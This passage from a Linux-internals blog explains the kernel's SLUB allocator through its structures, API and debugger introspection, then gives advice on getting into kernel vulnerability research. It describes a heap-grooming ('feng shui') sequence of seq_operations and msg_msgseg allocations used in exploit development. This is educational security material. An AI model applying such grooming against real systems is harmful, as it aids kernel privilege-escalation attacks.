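    assert inuse < (1 << INUSE_BITS) and objects < (1 << OBJECTS_BITS)
    return inuse | (objects << INUSE_BITS) | (int(frozen) << (INUSE_BITS + OBJECTS_BITS))


def unpack_counters(counters):
    """Split `counters` back into (inuse, objects, frozen)."""
    inuse = counters & ((1 << INUSE_BITS) - 1)
    objects = (counters >> INUSE_BITS) & ((1 << OBJECTS_BITS) - 1)
    frozen = bool((counters >> (INUSE_BITS + OBJECTS_BITS)) & 1)
    return inuse, objects, frozen
```

Having everything in one word is handy when the whole lot needs to be read, compared or swapped in one go, rather than field by field.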

frozen is a boolean flag that tells SLUB whether the slab has been frozen or not. Frozen slabs are “exempt from list management. It is not on any list except per cpu partial list. The processor that froze the slab is the one who can perform list operations on the slab”.[8]

CONFIG_MEMCG “provides control over the memory footprint of tasks in a cgroup”[9]. Part of this includes accounting kernel memory for memory cgroups (memcgs)[10]. Allocations made with the GFP flag GFP_KERNEL_ACCOUNT are accounted.

memcg_data is used when accounting is enabled to store “the object cgroups vector associated with a slab”[11].

Wrap-up

Whew, that was quite the knowledge dump! If you read through that start-to-finish then kudos to you cos that’s a lot to take in; hopefully it’s not too dry.

The aim of this section was to provide a decent foundational understanding of the SLUB allocator as seen in modern Linux kernels by exploring the core data structures used in its implementation and how they fit together.

Next up we’ll use this to take a look at the API and how the SLUB allocator can be used by other parts of the kernel. A bit later we’ll also touch on some introspection, if you want to get some hands on and explore some of these data structures and stuff.

https://lwn.net/Articles/881039/
https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L23
Remember page order sizes from the previous section? A 0x1000 byte slab is an order 0 slab (2^0 pages).
https://lwn.net/Articles/452884/
https://www.kernel.org/doc/html/latest/core-api/memory-allocation.html
https://lwn.net/Articles/881039/
we’ll remember from previous posts that there is a struct page for every physical page of memory that the kernel manages
https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L74
https://cateee.net/lkddb/web-lkddb/MEMCG.html
https://www.kernel.org/doc/Documentation/cgroup-v1/memory.txt
https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab.h#L433

The API

Thought you were done with kernel code? Hah! Think again. Time to take our understanding of the kernel’s SLUB allocator and explore its API.

Like all my posts, this is pretty ad hoc, so if I get excited we might take a deeper look into some of the allocator functions and have a peek at the implementation.

It’s worth highlighting again that there are three slab allocator implementations in the Linux kernel: SLAB, SLUB & SLOB. They share the same API, so as to abstract the implementation from the rest of the kernel.

As you might expect, be prepared for plenty of #ifdefs when perusing the source! The starting point for which is probably going to be [include/linux/slab.h](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h).

kmalloc & kfree

void *kmalloc(size_t size, gfp_t flags)

/include/linux/slab.h

The bread and butter of the slab allocator API, kmalloc(), as the name implies, is essentially the kernel equivalent of C’s malloc().

It allows a kernel developer to request a memory allocation of size bytes. On success the function returns a pointer to the allocated memory; on failure it returns NULL, which callers typically turn into an error code[1] such as -ENOMEM.

static __always_inline __alloc_size(1) void *kmalloc(size_t size, gfp_t flags)
{
	if (__builtin_constant_p(size)) {
		if (size > KMALLOC_MAX_CACHE_SIZE)
			return kmalloc_large(size, flags);
	}
	return __kmalloc(size, flags);
}

We can see the generic kmalloc() definition is a wrapper around __kmalloc() which is prototyped in slab.h, but the definition is slab implementation specific.

The kmalloc() wrapper essentially hands off large allocations (defined by [KMALLOC_MAX_CACHE_SIZE](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L290)) to a separate function: [kmalloc_large()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L526) which in fact calls the underlying buddy allocator to serve large allocations!

Otherwise, [__kmalloc()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L434) is called, whose implementation can be found in [/mm/slub.c](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slub.c#L4412).

void *__kmalloc(size_t size, gfp_t flags) { 
	struct kmem_cache *s;
	void *ret;
	...
	s = kmalloc_slab(size, flags);         [0]
	...
}

Bringing things back round to the SLUB allocator, if this is making an allocation of size bytes - what kmem_cache is it allocating from? Good question!

By default the kernel creates an array of general purpose kmem_caches depending on the “kmalloc type” (derived from flags) and the allocation size.

These caches are mainly created via [create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.0.6/source/mm/slab_common.c#L875) and stored in the exported symbol [kmalloc_caches](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L339):

extern struct kmem_cache *
kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1];

/include/linux/slab.h

So to answer our question: kmalloc() will determine which kmem_cache to allocate from by using the flags and size arguments to index into kmalloc_caches:

	return kmalloc_caches[kmalloc_type(flags)][index];

/mm/slab_common.c

The index above is derived from size. The general purpose cache size-to-index mapping can be seen via the [__kmalloc_index()](https://elixir.bootlin.com/linux/v6.0.6/source/include/linux/slab.h#L386) definition.

This tells us the size of the objects in each kmem_cache, e.g. the kmem_cache for 256 byte objects will be at index 8.

Note that a kmalloc() allocation will use the smallest kmem_cache object size it can fit into. E.g. a 257 byte allocation won’t fit into the 256 byte objects, so it will allocate from the next cache after, which is 512 byte objects.
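As a rough model of that size-to-index mapping, here’s a simplified userspace sketch. It assumes a minimum kmalloc size of 8 bytes and a largest general purpose cache of 8192 bytes (typical for x86_64 with SLUB, but configuration dependent). model_kmalloc_index() and model_kmalloc_object_size() are hypothetical helpers for illustration, not the kernel’s __kmalloc_index().

```c
#include <assert.h>
#include <stddef.h>

/* Assumptions for this model; the real values depend on kernel config. */
#define MODEL_MIN_SIZE		8
#define MODEL_MAX_CACHE_SIZE	8192

/*
 * Map an allocation size to a general purpose cache index.
 * Returns -1 if the size is too big for the general purpose caches.
 */
static int model_kmalloc_index(size_t size)
{
	int index = 3;

	if (size == 0)
		return 0;
	if (size > MODEL_MAX_CACHE_SIZE)
		return -1;
	if (size <= MODEL_MIN_SIZE)
		return 3;
	/* The two non-power-of-two caches live at indexes 1 and 2. */
	if (size > 64 && size <= 96)
		return 1;
	if (size > 128 && size <= 192)
		return 2;
	/* Otherwise: the smallest power of two that fits the request. */
	while (((size_t)1 << index) < size)
		index++;
	return index;
}

/* Object size of the cache at a given (non-zero) index. */
static size_t model_kmalloc_object_size(int index)
{
	assert(index >= 1 && index <= 13);
	if (index == 1)
		return 96;
	if (index == 2)
		return 192;
	return (size_t)1 << index;
}
```

With this model, a 256 byte request maps to index 8 (256 byte objects), while a 257 byte request spills over to index 9 (512 byte objects), matching the note above.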

void kfree(const void *objp)

/include/linux/slab.h

Before you go throwing kmalloc()’s left and right, don’t forget kfree()! This is of course the ubiquitous function for freeing memory allocated via the slab allocator.

Calling this function on an object allocated via the slab allocator will free that object. If its slab was on the full list, the slab becomes partial, and if this was the last allocated object in the slab then the slab may get released altogether.

kmem_cache_create

struct kmem_cache *kmem_cache_create(const char *name, unsigned int size,
			unsigned int align, slab_flags_t flags,
			void (*ctor)(void *));

/include/linux/slab.h

So we’ve covered the fundamentals: allocating and freeing via the slab allocator. kmem_cache_create() allows kernel developers to create their own kmem_cache within the slab allocator - pretty neat, right?

Creating a special-purpose cache can be advantageous, especially for objects which are allocated often (like struct task_struct):

We can reduce internal fragmentation by specifying the object size to suit our needs, as the general purpose caches have fixed object sizes which may not be optimal
ctor() allows us to optimise initialisation of our objects if values are being reused
There’s also debugging, security and other benefits to this but you get the gist!

We can actually use Elixir to see all the references to kmem_cache_create() in the kernel to see who’s making use of this too!

kmem_cache_alloc

void *kmem_cache_alloc(struct kmem_cache *s, gfp_t flags) __assume_slab_alignment __malloc;

/include/linux/slab.h

Once we’ve created a kmem_cache, we can use kmem_cache_alloc() to allocate an object directly from that cache. You’ll notice here we don’t supply a size, as caches have fixed sized objects and we’re specifying directly the cache we want to allocate from!

cache aliases

Something I haven’t mentioned up until now is the concept of SLUB aliasing.

To reduce fragmentation, the kernel may “merge” caches with similar properties (alignment, size, flags etc.). find_mergeable() implements this mergeability check:

struct kmem_cache *find_mergeable(unsigned size, unsigned align,
		slab_flags_t flags, const char *name, void (*ctor)(void *));

/mm/slab.h

A special-purpose cache may get merged/aliased with one of the general-purpose caches we touched on earlier, so allocations via kmem_cache_alloc() for a merged cache will actually come from the respective general-purpose cache.

https://man7.org/linux/man-pages/man3/errno.3.html

Seeing It In Action

This is where things get fun! In this section we’re gonna take what we’ve learned throughout this post and double check I haven’t been making it all up :D

/proc/slabinfo

Our good ol’ friend [procfs](https://man7.org/linux/man-pages/man5/proc.5.html) is coming in strong again by giving us [/proc/slabinfo](https://man7.org/linux/man-pages/man5/slabinfo.5.html), which exposes kernel slab allocator statistics to privileged users.

$ sudo cat /proc/slabinfo
slabinfo - version: 2.1
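# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>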
...
task_struct         1480   1539   8384    3    8 : tunables    0    0    0 : slabdata    513    513      0
...
dma-kmalloc-512        0      0    512   32    4 : tunables    0    0    0 : slabdata      0      0      0
...
kmalloc-cg-512      1169   1312    512   32    4 : tunables    0    0    0 : slabdata     41     41      0
...
kmalloc-512        40878  43360    512   32    4 : tunables    0    0    0 : slabdata   1355   1355      0
kmalloc-256        21850  21856    256   32    2 : tunables    0    0    0 : slabdata    683    683      0
kmalloc-192        35987  37002    192   21    1 : tunables    0    0    0 : slabdata   1762   1762      0
kmalloc-128         4555   5440    128   32    1 : tunables    0    0    0 : slabdata    170    170      0

snippet from $ sudo cat /proc/slabinfo

This provides some useful information on the various caches on the system. From the snippet above we can see some of the stuff we touched on in the API section!

We can see a private cache named task_struct, used for struct task_struct. Additionally we can see several general purpose caches of various kmalloc types (KMALLOC_DMA, KMALLOC_CGROUP and KMALLOC_NORMAL respectively) and sizes.
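If you’d rather poke at these numbers programmatically, here’s a minimal sketch of parsing a single cache line. It assumes the version 2.1 column order documented in slabinfo(5) (name, active_objs, num_objs, objsize, objperslab, pagesperslab) and 4 KiB pages; struct slabinfo_entry, parse_slabinfo_line() and slab_slack_bytes() are hypothetical names for illustration.

```c
#include <assert.h>
#include <stdio.h>

#define MODEL_PAGE_SIZE 4096UL	/* assumption: 4 KiB pages */

/* The first six columns of a /proc/slabinfo cache line. */
struct slabinfo_entry {
	char name[64];
	unsigned long active_objs;
	unsigned long num_objs;
	unsigned long objsize;
	unsigned long objperslab;
	unsigned long pagesperslab;
};

/* Returns 0 on success, -1 if the line isn't a cache entry (e.g. a header). */
static int parse_slabinfo_line(const char *line, struct slabinfo_entry *e)
{
	int n;

	assert(line && e);
	n = sscanf(line, "%63s %lu %lu %lu %lu %lu", e->name,
		   &e->active_objs, &e->num_objs, &e->objsize,
		   &e->objperslab, &e->pagesperslab);
	return n == 6 ? 0 : -1;
}

/* Bytes in each slab that aren't covered by objects. */
static unsigned long slab_slack_bytes(const struct slabinfo_entry *e)
{
	return e->pagesperslab * MODEL_PAGE_SIZE - e->objperslab * e->objsize;
}
```

Feeding it the kmalloc-192 line from the snippet above gives 21 objects of 192 bytes in a single page, which leaves 64 bytes of slack per slab; the kmalloc-512 line works out to exactly four pages with nothing left over.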

slabtop

[slabtop](https://man7.org/linux/man-pages/man1/slabtop.1.html) is a neat little tool, and part of the /proc filesystem utilities project, which takes the introspection a step further by providing realtime slab cache information!

 Active / Total Objects (% used)    : 3479009 / 3524760 (98.7%)
 Active / Total Slabs (% used)      : 100682 / 100682 (100.0%)
 Active / Total Caches (% used)     : 130 / 181 (71.8%)
 Active / Total Size (% used)       : 923525.41K / 936501.10K (98.6%)
 Minimum / Average / Maximum Object : 0.01K / 0.27K / 295.07K

  OBJS ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME                   
 766116 766116 100%    0.10K  19644       39     78576K buffer_head
...
 43328  40468  93%    0.50K   1354       32     21664K kmalloc-512
 36981  35834  96%    0.19K   1761       21      7044K kmalloc-192

snippet from $ sudo slabtop

slabinfo

Perhaps confusingly, there is also a tool named slabinfo which is provided with the kernel source in tools/vm/slabinfo.c (calling make in tools/vm is all you need to do to build this and get stuck in).

To further the confusion, instead of /proc/slabinfo, slabinfo uses /sys/kernel/slab/[1] as its source of information. It contains a snapshot of the internal state of the slab allocator which can be processed by slabinfo.

Further to our section on cache aliases earlier, we can use slabinfo -a to see a list of all the current cache aliases on our system!

$ ./slabinfo -a
...
:0000256     <- key_jar

Here we can see the kmem_cache with name "key_jar" is aliased with kmalloc-256.

debugging

Sometimes you just can’t beat getting stuck into some good ol’ kernel debugging. I’ve covered previously how to get this set up[2]; it’s fairly quick to get kernel debugging via gdb up and running on a QEMU/VMWare guest, I promise!

After that we can explore to our heart’s content. We can unravel the exported list slab_caches directly, or perhaps break on a call to kmalloc() and see what hits first.

gef➤  b __kmalloc
Breakpoint 2 at 0xffffffff81347240: file mm/slub.c, line 4391.
...
──────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81347240 → __kmalloc(size=0x108, flags=0xdc0)
[#1] 0xffffffff81c4911c → kmalloc(flags=0xdc0, size=0x108)
[#2] 0xffffffff81c4911c → kzalloc(flags=0xcc0, size=0x108)
[#3] 0xffffffff81c4911c → fib6_info_alloc(gfp_flags=0xcc0, with_fib6_nh=0x1)
[#4] 0xffffffff81c44186 → ip6_route_info_create(cfg=0xffffc900007a7a58, gfp_flags=0xcc0, extack=0xffffc900007a7bb0)

Given I’m ssh’d into my guest, it’s probably unsurprising there’s network stuff kicking about. Looks like someone’s requested a 0x108 byte object, and as we’re going through kmalloc() this should end up in one of the general purpose caches.

0x108 is 264 bytes, so that’s just too big for the kmalloc-256 cache, so we should expect an allocation from one of the 512 byte general purpose caches, right? Let’s find out!

void *__kmalloc(size_t size, gfp_t flags)
{
	struct kmem_cache *s;
	...
	s = kmalloc_slab(size, flags);

Looking at the source, we can see the call to kmalloc_slab() will return our cache.

gef➤  disas 
Dump of assembler code for function __kmalloc:
=> 0xffffffff81347240 <+0>:     nop    DWORD PTR [rax+rax*1+0x0]
   0xffffffff81347245 <+5>:     push   rbp
   0xffffffff81347246 <+6>:     mov    rbp,rsp
   0xffffffff81347249 <+9>:     push   r15
   0xffffffff8134724b <+11>:    push   r14
   0xffffffff8134724d <+13>:    mov    r14d,esi
   0xffffffff81347250 <+16>:    push   r13
   0xffffffff81347252 <+18>:    push   r12
   0xffffffff81347254 <+20>:    push   rbx
   0xffffffff81347255 <+21>:    sub    rsp,0x18
   0xffffffff81347259 <+25>:    mov    QWORD PTR [rbp-0x40],rdi
   0xffffffff8134725d <+29>:    mov    rax,QWORD PTR gs:0x28
   0xffffffff81347266 <+38>:    mov    QWORD PTR [rbp-0x30],rax
   0xffffffff8134726a <+42>:    xor    eax,eax
   0xffffffff8134726c <+44>:    cmp    rdi,0x2000
   0xffffffff81347273 <+51>:    ja     0xffffffff813474d8 <__kmalloc+664>
   0xffffffff81347279 <+57>:    mov    rdi,QWORD PTR [rbp-0x40]
   0xffffffff8134727d <+61>:    call   0xffffffff812dbe70 <kmalloc_slab>
   0xffffffff81347282 <+66>:    mov    r12,rax
   ...

Okay, nice, we can see the call to kmalloc_slab() at __kmalloc+61, so we just need to check the return value after that call :) Cos we’re on x86_64 we know it’ll be in $RAX.

───────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xffff888100041a00  →  0x0000000000035140  →  0x0000000000035140
...
─────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0xffffffff81347273 <__kmalloc+51>   ja     0xffffffff813474d8 <__kmalloc+664>
   0xffffffff81347279 <__kmalloc+57>   mov    rdi, QWORD PTR [rbp-0x40]
   0xffffffff8134727d <__kmalloc+61>   call   0xffffffff812dbe70 <kmalloc_slab>
 → 0xffffffff81347282 <__kmalloc+66>   mov    r12, rax
...
───────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81347282 → __kmalloc(size=0x108, flags=0xdc0)
────────────────────────────────────────────────────────────────────────────────────────────
gef➤  p *(struct kmem_cache*)$rax
$6 = {
  ...
  size = 0x200,
  object_size = 0x200,
  ...
  ctor = 0x0,
  inuse = 0x200,
  ...
  name = 0xffffffff8297cb4c "kmalloc-512",

And voila! We cast the value returned by kmalloc_slab() as a kmem_cache and just like that we can view the members. We can see the name is indeed kmalloc-512 as we hypothesised and we can also see some of the other fields we touched on :)

Anyway, hopefully that was a fun little demo on how you can reinforce your understanding with a little exploration in the debugger.

I also wanted to highlight [drgn](https://github.com/osandov/drgn) as another debugger to tinker with, which lets you do live introspection & debugging on your kernel. It’s written in Python and is very programmable; however, I couldn’t get it to find some symbols for this particular demo.

slxbtrace (ebpf)

Now for the grand reveal, the real reason behind this 5,000 word (yikes) post … a cool little tool I’ve been working on for visualising slub allocations :D

Well, this could very well already be a thing, but I’d been sleeping on ebpf for far too long and this seemed like a fun way to explore the tooling.

Without going too much into the ebpf implementation (another post, maybe?!), slxbtrace[3] lets you specify a specific cache size and visualise the cache state. In particular you can highlight allocations from particular call sites, making it a neat tool for helping with heap feng shui during exploit development.

pls excuse the flickering… my fault for using linux

Let me explain what on earth is going on here. So, slxbtrace will basically hook and process calls to kmalloc() and kfree() and show you what’s where in a cache.

So far it’s pretty naive, when you run it, it has no knowledge of the cache state. However, once it starts catching kmalloc()’s it can build up an idea of where the slabs are (as they’re page aligned) and the objects in it.

Each known slab is visualised. We can see the slab address on the left, and then the objects in the slab as they’d sit in memory:

? means slxbtrace doesn’t know the state of this object
- represents a free object
x represents a miscellaneous allocation
0... we can then tag specific allocations so they’re easy to visualise

So what’s going on in this demo?! Well, I am tracking the state of the kmalloc-cg-32 cache with slxbtrace on the left, while I run a program which triggers a bunch of kmallocations on the right (kmalloc32-fengshui). This program:

Triggers 800 allocations of struct seq_operations, whose allocations are tracked as |0|, to fill up some slabs!
Frees every other struct seq_operations after the first 400, effectively trying to make some holes (denoted by |-|) in the slabs we just filled up
Next I allocate a bunch of struct msg_msgsegs of the same size (denoted by |1|), trying to land them next to my struct seq_operations in memory :D
Finally I clean up everything and free it all :)

Right now this is just a very, very barebones poc and likely has some issues, but I thought it would be neat to share here as it demonstrates some of the stuff we’ve touched on.

I will absolutely share all this on my github though, once it’s in a shareable state, just in case anyone else is also interested in playing around!

https://www.kernel.org/doc/Documentation/ABI/testing/sysfs-kernel-slab
https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/#debugging
not the final name, probably

Wrapping Up

Is this… did we… is it over? This one really turned into an absolute leviathan, but perhaps that’s just a testament to the work behind the kernel’s slab allocator!

In this post we covered an integral part of the kernel’s memory management subsystem: the slab allocator. Specifically, we looked at the SLUB implementation, which is the de facto implementation on modern systems (bar embedded stuff).

We really lived up to the Linux internals namesake in this post, as we dived in and explored the SLUB allocator from all angles: the underpinning data structures, the API used by the rest of the kernel and then validated this all with some introspection.

Hopefully this provided a reasonably holistic insight into slab allocators, with opportunities for further reading/exploration readily available.

Also worth noting we kept things pretty shiny as we looked primarily at the latest (at the time of starting) kernel release, v6.0.6!

I was going to expand a bit on SLAB and SLOB, but to be honest we’re almost at 6000 words and it’s probably out of scope for my aims for this series, but just in case:

SLAB (non-default for around 14 years) was the previous default implementation and the tl;dr is it was more complex than SLUB and less friendly to modern multi-core systems [1]
SLOB was introduced ~2005 and aimed at embedded devices, trying to keep things as compact as possible to make the most of less memory [2]

Next Time!

Well, to be honest, as far as “Memory Allocators” goes as a topic, we’ve done pretty well between our coverage on the buddy and slab allocators.

I’m not entirely sure there will be a next time for this mini series, I might hop back onto the virtual memory stuff and look into the lower level implementation there.

That said, if I were to explore the memory allocator space more I’d want to cover the security side of things: memory allocators in the context of exploit techniques and mitigations. If that’s something you’d be into, feel free to let me know :)

Otherwise: thanks for reading, and as always feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

So You Wanna Pwn The Kernel?

sam4k — Thu, 01 Sep 2022 14:07:40 +0000

Initially I was going to write the next instalment of the Linternals: Virtual Memory series after getting back from HITB2022SIN, but after a number of offline and online conversations it seems like this could help a number of you out, so let’s give it a go!

My aim for this post is to provide some insights into getting into Linux kernel vulnerability research and exploit development (VRED), although I’m sure some of this will be transferable to similar areas.[1]

Sounds fairly straightforward, right? Well, much like the process of writing a kernel exploit, diving into this can also be open-ended and confusing. There are many approaches and a wealth of resources out there, with no clearly defined path to follow.

Is this post going to pave that clearly defined path? Probably not. We all learn in different ways, have different experiences, motivations and goals. Hopefully, however, I can help demystify this topic a bit for you and give you the tools necessary to pave the right path for you.

Overview
Mindset
- Motivation
- Curiosity
- Perseverance
- Ego
Approaches
- Reading
- Videos
- Projects
Workflow
Resources
Wrapping Up

For a more general post on demystifying security research, I absolutely recommend a post of the same title by Alex Plaskett here, which touches on similar themes

Overview

As I mentioned above, linux vred is a complex and constantly evolving topic. So as you might imagine, trying to write an accessible, usable introduction to this topic has its own challenges. But we gotta try!

The first thing I want to cover is mindset. Yeah, I get it, sounds wishy-washy and inactionable, but I think it will help to talk a bit about some useful mindset tips for approaching work like this and avoiding burnout.

Then I’ll move onto talking about approaches you can take to begin your journey down the rabbit hole that is linux vred and hone your skills. Again, worth highlighting here that these are just suggestions from my experiences and are non-exhaustive.

I’ll briefly touch on my workflow and some of the tooling I find useful, again this is really personal preference, but may be helpful as a starting point. Plus I always find it interesting to hear what cool tools and workflows other people use!

Finally I’ll wrap things up with a list of resources, this will be far from exhaustive as well, but hopefully I’ll get a decent amount of stuff in there!

Mindset

Motivation

At risk of sounding like one of those YouTube motivational speakers, one of the first things you want to understand is your motivation for getting into this.

💡

Do you love understanding things and then breaking them? Do you use Linux daily and finally want to get back at it? Do you want to pivot from exploiting a different platform? Did you watch the movie Blackhat (2015)? Do you want a new hobby to keep you up till 4am?

Whatever your motivation, it’s important to go into this with the understanding that this is a long journey, you (probably) won’t be pwning kernels overnight! In fact, you’ll never understand everything. There will be many “failures” and hurdles along the way.

But that’s okay! Actually, it’s more than okay, that means you’re (probably) doing it right! Though, I’d be lying if I said this cycle of learning and “failure” with the occasional success wasn’t a magnet for burnout and motivational humps.

However, by understanding your motivations and goals, as well as what you’re getting into, these motivational humps can be more manageable and infrequent.

In terms of managing these humps, try where possible to prioritise working on things you enjoy and are interested in. Not only will it be better for your mental health, but you’ll also likely find yourself more productive.

Due to the open-ended and exploratory nature of vred, you’re not gonna have a good time trying to innovate and seek out solutions if you’re completely unmotivated to do so. For the same reason, having some structure and milestones associated with tasks also helps prevent feelings of aimless drifting or getting overwhelmed.

Like I said though, these humps aren’t always avoidable and are managed differently by different people, so I won’t pretend to know the answers. For example, a common recommendation, and one I use, is to remember to context switch!

If you’ve been bashing your head against the keyboard for some months, neck-deep in C source code trying to find a particular primitive, sometimes it can help to take a pause. Go write that Python tool you’ve been meaning to. No, you won’t forget everything. In fact, you may come back with a fresh perspective and clear mind.

Curiosity

Curiosity may have killed the cat, but it’s a security researcher’s best friend. Especially starting out, it can be tempting to rush to popping that shell.

Trust me, I’ve been guilty of it many a time. You’re just starting out and trying a kernel CTF and you just want to get that flag to prove you can do it, right? So you Google some techniques and you copy and paste some code, tweak some stuff and keep iterating until you get it.

But as Emerson said, “It’s not the destination, it’s the journey”. More important than popping the shell, is understanding how you popped it. The former may be a win here, but it’s that deeper understanding which will net you future wins.

Be curious! Ask questions! Take your time. If you don’t quite understand this technique you’ve seen, spend some time playing around with it until you do. If something isn’t working, spend some time getting to the root cause rather than jumping straight to another approach.

This fundamental understanding you’ll develop by being curious is a lot more flexible and applicable to future projects than a surface level awareness of potential techniques or approaches.

Perseverance

I’ve touched on this a few times now: kernel VRED is both complex and open-ended. Not only is there no clear path to winning, sometimes there is no path at all.

There might not be a bug in that module you’ve been looking at or a way to elevate your privileges with that heap overflow. Again, that’s okay, it’s normal!

Being able to persevere in the face of regular hurdles and dead-ends is key. An important aspect of this is defining “success” and “failure”. I’ve thrown the F word around a few times so far, and been mindful to put it in quotes.

Just because you’ve spent months searching for a bug in a kernel module and come up with nothing, doesn’t mean you’ve failed. During that time you’ve likely deepened your understanding of the kernel, improved your workflow, come up with tooling etc.

All of these are things which can help you “win” going forward, so yes while perseverance is key when you hit these roadblocks and dead-ends, also try not to just see them as failures!

It’s also worth noting, the flip side of this is knowing when to call it quits. Later, in the workflow section, I talk about having a gameplan for approaching vred tasks, such that when you’ve exhausted your gameplan, you know it’s time to move on.

Ego

“your idea or opinion of yourself, especially your feeling of your own importance and ability” - Cambridge Dictionary on “ego”

Ego plays a big role in our industry, and fortunately is something that is spoken about more these days. And no I’m not talking about inflated egos (yet), but imposter syndrome.

In the beginning, you may come into this field finding things extremely daunting and overwhelming. After all, the kernel is huge and complicated and there’s so many super smart people out there publishing some amazing work!

For many of us, this feeling never goes away. Myself included! I recently did my first conference talk at HITB2022SIN, and I was anxious for weeks in the build up despite the topic being something I worked on for months and was super familiar with.

Part of this was to do with public speaking, but part was worrying about the quality and validity of my work in the eyes of peers. What if it was all horribly wrong?!

So this section is just to reassure that if you feel this, it’s okay, you’re not alone! While this is common, try not to let it get on top of you! My main advice here would be that the only person you should be comparing yourself with is yourself a year or so ago[1] :)

The flip side to this, of course, is that I think it’s good to maintain a level of humility. This is a field that is constantly evolving and you’ll never know it all. Furthermore, due to the complexity of some of this stuff, you might not have a complete understanding. This is all okay, just be open, and happy even, to adjust that understanding.

Totally arbitrary number of course, as you may have taken a break and been working in other areas, but you get the gist of what I mean

Approaches

Alright, let’s move onto some hands on advice! Hopefully now I’ve instilled some of the mindset involved in getting into kernel vred stuff, it’s time to put it to good use!

As has been a running theme here, there’s many different approaches to get stuck into this and we all approach learning in different ways. I’ve tried to provide a variety of options here, though this is far from an exhaustive list.

Feel free to experiment, mix-and-match and see what works best for you! To throw in my 10 cents: I have found hands-on projects by far the best method to develop a working understanding of new stuff, supplementing this with some reading.

Reading

Okay, so the bread-and-butter for learning about kernel vred stuff is going to be reading; there’s a wealth of blog posts and publications out there on a range of topics.

Not sure what else to say about this, other than that the hardest part here is finding and curating these readings. Contributors range from hobbyists to professional researchers and academics, all hosting their work in different places.

Beyond the customary “use Twitter” for your infosec needs, I’ve also included a link in the resources below to a great repo called Linux Kernel Exploitation maintained by @andreyknvl which contains a pretty thorough list of reading materials.

Coming into this, the amount of materials out there may be overwhelming. I’d just suggest starting with stuff immediately relevant to what you’re working on/interested in. E.g. if you want to try write a local priv esc, then read some recent LPE write-ups.

Also remember curiosity and perseverance. Some/most/all of this stuff may be utter gibberish at first, and that’s fine. Especially with VRED write-ups, each bug and exploit will have its own specific nuances which will be foreign to even experienced folks reading them for the first time.

Just remember to take your time to pause and follow up each bit you don’t understand, even if it leads you down another rabbit hole, until you can piece it together.

Also another disclaimer that not everyone who takes the time to share their work is a NYT best seller, graphics designer or native English speaker!

Videos

If you’re more of a visual learner, the options are a bit more limited but not non-existent. Besides my GIFs and occasional diagrams, there are a reasonable number of recorded conference talks available on YouTube.

Again, the problem here becomes trying to find which conferences to check out for content, because some of these may not index well and may not have a tonne of views. In the Resources section below, I’ll include a list of con channels to get you started.

I’m sure there’s probably some great content creators out there pumping out videos, but as that’s not my preferred media I’m afraid I can’t help much there. If you know of any I can plug here who make vids on Linternals / VRED then @ me pls.

Projects

I feel like theory can only get you so far and if you’re interested in doing some kernel vred, you’re going to need to get your hands dirty at some point anyway!

By getting some hands on, you’re able to put into practice the techniques and understanding you’ve gained from your research. Furthermore, sometimes the best way to understand something in the kernel is to get in the debugger and take a peek yourself.

However, it’s one thing to be told “just get some hands on experience!” and another to actually know where to start, especially if you’re completely new to this.

As a result, I’ll include some ideas and starting points for potential projects here. You’ll find the more you get into things, the more ideas you’ll have for your own tooling or experiments as you go on:

A core part of kernel vred is, of course, understanding the kernel, so one project idea could be to try writing your own kernel driver and playing around with some features (reading input from userspace via IOCTLs, allocating memory etc.)
Follow along with exploit write-ups! Find a local privilege escalation write-up you like (maybe with source available) and try to follow along and get it running in a VM; again taking the time to understand the hows and whys of what’s going on
Taking this a step further, you could try the above without source or even without a write-up by looking at some CVEs. Alternatively, piggy-backing off of idea 1 you could write your own vulnerable driver and exploit that :)
CTFs are of course another popular way to test your kernel vred mettle, and I’ll provide some links in the resources to some below.
Tooling! Writing tooling to improve your kernel vred workflow or even just to explore kernel internals can be a great way to develop that fundamental understanding. Don’t worry if you don’t have ideas right now, trust me you will!
Posting your own write-ups or analysis! When I started this blog, I actually never intended for anyone to see it, it was just a way to motivate myself to look into various topics and refine my understanding on them via writing accessible posts

Workflow

Now onto the less glamorous, but just as fundamental part: workflow. I appreciate this is highly preference based, so this is more for reference and because I also find it interesting to hear about other people’s workflows.

Your workflow is something that will likely constantly evolve, refined over an iterative process of discovering new tools and deeper understanding of your own preferences, strengths and weaknesses. Don’t be afraid to try new things! :)

Tooling

For my IDE, I use “a configuration framework for GNU Emacs” called Doom. It’s very easy to set up (and tweak) and the default settings are pretty good. I actually found this project thanks to a great talk, “Kernel Hacking Like It’s 2020” by Russell Currey.

If you’re interested in finding out more about Doom Emacs, there’s a cool playlist on YouTube to get you started by Zaiste Programming.

Another cornerstone of my workflow is virtualisation. Whenever I’m writing up a new exploit or doing some testing, I’ll be spinning up a representative target VM[1]. My tool of choice here is QEMU; I find it to be lightweight and very flexible (and it’s free and open-source!).

The last part of the tooling trifecta for me: the debugger. Perhaps unsurprisingly I’m regularly neck-deep in gdb[2]. Despite being quite literally older than me, it still holds up. That said, addons like hugsy’s GEF (GDB Enhanced Features) make life easier.

Organisation

AKA Documentation. Yep, I said it. But no, I’m not talking about carefully curated and margin-tweaked executive reports or several hundred page long technical specifications.

I can’t stress enough how much future you will thank yourself if you get into the habit of documenting your work early on. It doesn’t have to be anything fancy, I just use markdown + git. Just make sure there’s some semblance of order and that it’s going to be easy for you to hunt down and refer back to later.

